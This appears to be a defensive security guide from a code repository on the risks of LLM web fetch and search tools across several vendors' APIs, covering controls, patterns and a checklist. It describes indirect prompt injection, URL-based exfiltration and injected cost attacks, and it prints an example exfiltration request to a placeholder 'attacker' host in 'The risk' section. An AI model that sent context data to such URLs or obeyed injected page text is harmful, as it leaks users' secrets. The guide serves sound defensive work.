SPB Git forge

spb/doc-api

Public
2commits 1branches 0releases
15.7 MBsize
maindefault branch
13 days agolast push
Python 88.3% TypeScript 7.6% Shell 4.1%
9.7 KB

# Web browsing, search and fetch tools

Status: DOCUMENTED (xAI web_search + x_search LIVE_VERIFIED 2026-09-19; Gemini urlContext LIVE_VERIFIED, googleSearch ACCOUNT_RESTRICTED on the free-tier key) Sources: https://platform.claude.com/docs/en/agents-and-tools/tool-use/web-fetch-tool · …/web-search-tool · https://platform.claude.com/docs/en/manage-claude/api-and-data-retention · OpenAI OpenAPI spec (web_search) · https://developers.openai.com/api/docs/guides/tools-connectors-mcp#risks-and-safety · xAI: https://docs.x.ai/developers/tools/web-search (allowed_domains/excluded_domains ≤ 5 exclusive, enable_image_understanding, enable_image_search; sub-tools web_search, browse_page, open_page, open_page_with_find), https://docs.x.ai/developers/tools/x-search (allowed_x_handles/excluded_x_handles, from_date/to_date, enable_video_understanding), https://docs.x.ai/developers/tools/citations (url_citation annotations, inline [[N]](url), include:["no_inline_citations"]), https://docs.x.ai/developers/pricing (per-call / per-post pricing) · Gemini: https://ai.google.dev/gemini-api/docs/google-search (groundingMetadata, Search Suggestions display requirement, redirect URIs), https://ai.google.dev/gemini-api/terms (grounded results: no caching/syndication/training; 30-day storage), https://ai.google.dev/gemini-api/docs/url-context (public URLs only, 20/request, 34 MB, URL_RETRIEVAL_STATUS_UNSAFE), https://ai.google.dev/gemini-api/docs/maps-grounding Last verified: 2026-09-19

# The risk

A model that can read the web is exposed to indirect prompt injection; a model that can request arbitrary URLs can be turned into an exfiltration channel (GET https://attacker/?secret=<data from your context>). Anthropic's web-fetch docs say it directly: enabling web fetch "where Claude processes untrusted input alongside sensitive data poses data exfiltration risks. Only use this tool in trusted environments or when handling non-sensitive data."

# Anthropic web_fetch_* — controls

Parameter / rule Effect
URL must already be in the conversation Claude can only fetch URLs that appeared in user messages, client-side tool results, or previous web search/fetch results — never a URL it generated itself. Violations return url_not_in_prior_context. This is the primary anti-exfiltration control; do not "help" the model by echoing its own URLs back in a tool result (that would launder them)
allowed_domains / blocked_domains domain allow/deny lists (bare domains, optional path prefix)
max_uses hard cap on fetches per request (max_uses_exceeded) — bounds cost and blast radius
max_content_tokens truncates fetched content — bounds injection payload size and cost
citations: {enabled: true} fetched text is cited; helps users verify where an answer came from
use_cache: false bypass the fetch cache when freshness matters (default true)
Error codes invalid_input, url_too_long, url_not_allowed, url_not_accessible, unsupported_content_type, too_many_requests, max_uses_exceeded, unavailable, url_not_in_prior_context — surface them, do not retry blindly
Versions web_fetch_20250910 … web_fetch_20260318 (dynamic filtering runs code over the page before it enters context) — check generated/tools.json for the version your model supports

# Anthropic web_search_* — controls

allowed_domains xor blocked_domains (sending both → 400), max_uses, user_location (avoid sending precise end-user location unless needed). Search results are third-party content: same injection caveats. Results come back as web_search_tool_result blocks with citations.

# OpenAI web_search (hosted)

{"type":"web_search"} (also web_search_preview, dated variants). Output items web_search_call + output_text annotations (url_citation). Filtering options are documented on the tool (see docs/tools/ for the exact fields per version) — apply the same principles: restrict domains where the tool allows it, and never treat page text as instructions. OpenAI's hosted search runs outside your network, so your SSRF surface is nil, but the injection surface is the same.

# xAI web_search and x_search (server-side, Responses API only)

  • Exfiltration surface = the model's own queries and page opens. The web_search sub-tools (web_search, web_search_with_snippets, browse_page, open_page, open_page_with_find) navigate to URLs the model chooses — there is no Anthropic-style "URL must already be in context" rule. Anything in the model's context (including secrets you pasted) can end up in a search query or a URL path. Restrict with allowed_domains (≤ 5, bare domains) or excluded_domains; bound the loop with max_turns; keep secrets out of requests that carry these tools.
  • x_search reads X posts, profiles and threads (sub-tools x_user_search, x_keyword_search, x_semantic_search, x_thread_fetch) — social content is the classic indirect-injection vector; scope with allowed_x_handles/excluded_x_handles and a date range; enable_video_understanding/enable_image_understanding widen the surface to media.
  • Output: web_search_call {action: search | open_page | find_in_page, sources (with include)}, custom_tool_call (x_search sub-tools), url_citation annotations plus inline [[N]](url) markdown by default — render citations as text, or disable inline links with include:["no_inline_citations"] so a model cannot smuggle an attacker URL into your UI as a "citation".
  • Billing is per successful call ($5 per 1k; X search moves to per-post/per-profile pricing on 2026-09-21) — a prompt-injected "search 50 more times" is also a cost attack: max_turns.
  • Not available on Chat Completions (422) — a Responses-only design keeps the browsing surface out of your plain chat endpoints.

# Gemini googleSearch, googleMaps and urlContext (server-side)

  • googleSearch has no domain filter (only timeRangeFilter, searchTypes.webSearch|imageSearch); results arrive as groundingMetadata.groundingChunks[].web{uri (Google redirect), title} + groundingSupports — untrusted third-party text. Terms: you must display the Search Suggestions widget (searchEntryPoint.renderedContent) to the requesting user, may not cache/syndicate/train on grounded results, and grounding prompts/outputs are stored 30 days and cannot be disabled (no ZDR). Billed per search query on Gemini 3 ($14/1k after the free 5,000/month); free-tier keys get 429 limit: 0 (ACCOUNT_RESTRICTED here).
  • urlContext fetches whatever URLs appear in the prompt (≤ 20, 34 MB each) — an injected URL in user text will be retrieved; the only structural protections are Google's: public URLs only (no localhost/private/tunnel hosts → SSRF into your network is impossible from Google's side, but the model can still read attacker pages), content moderation (URL_RETRIEVAL_STATUS_UNSAFE), no nested links. Pre-filter prompts against your own allowlist; check urlContextMetadata.urlMetadata[].urlRetrievalStatus; note fetched content is billed as input tokens even when retrieval fails (toolUsePromptTokenCount: 130 observed on an ERROR).
  • googleMaps grounding: display obligations (sources immediately after grounded content, googleMapsWidgetContextToken) and user location (toolConfig.retrievalConfig.latLng) — send end-user coordinates only with consent.
  • Combining googleSearch + urlContext ("search then read pages") + function calling (Gemini 3 tool combination) in one request gives the model read and act capabilities on untrusted pages — apply the "read-only second pass" pattern below.

# Self-hosted browsing (your own fetch tool)

If you implement fetching yourself (client tool, Anthropic browser_toolset, Playwright…), you inherit the full SSRF problem — see file-uploads-and-ssrf.md: resolve DNS and reject private/link-local/metadata ranges after redirects, allowlist schemes (https only), cap size and time, strip cookies/credentials, run in an egress-filtered network.

# Patterns

  1. Read-only, tool-less second pass: fetch with a request that has only the fetch tool; summarise; then run the request that has your sensitive tools using the summary, not the raw page.
  2. Never combine web fetch with tools that can send data out (email, HTTP POST, MCP write tools) in the same request when the input is untrusted.
  3. Mark fetched content in the transcript with its URL and timestamp; render links to users as text, not clickable auto-loaded content.
  4. Budget: max_uses + max_content_tokens + your BudgetGuard (docs/architecture/resilience.md).

# Checklist

  • Web fetch/search only in requests without sensitive data or without exfiltration-capable tools (xAI/Gemini search tools can carry context into queries).
  • Anthropic allowed_domains/blocked_domains, max_uses, max_content_tokens; xAI allowed_domains/excluded_domains (≤ 5) + allowed_x_handles + max_turns; Gemini: urlContext prompts pre-filtered, googleSearch accepted as unscoped or not enabled.
  • Never echo model-generated URLs back into context (Anthropic rule); never paste model-generated URLs into a Gemini prompt with urlContext on.
  • Tool error codes handled explicitly: Anthropic url_not_in_prior_context, Gemini URL_RETRIEVAL_STATUS_UNSAFE|ERROR|PAYWALL, xAI web_search_call.status.
  • Citations enabled and shown to users as text (url_citation annotations; xAI inline [[N]](url) disabled or sanitised); Gemini Search Suggestions rendered as required by the terms.
  • Self-hosted fetchers: SSRF controls, scheme allowlist, size/time caps, egress filtering.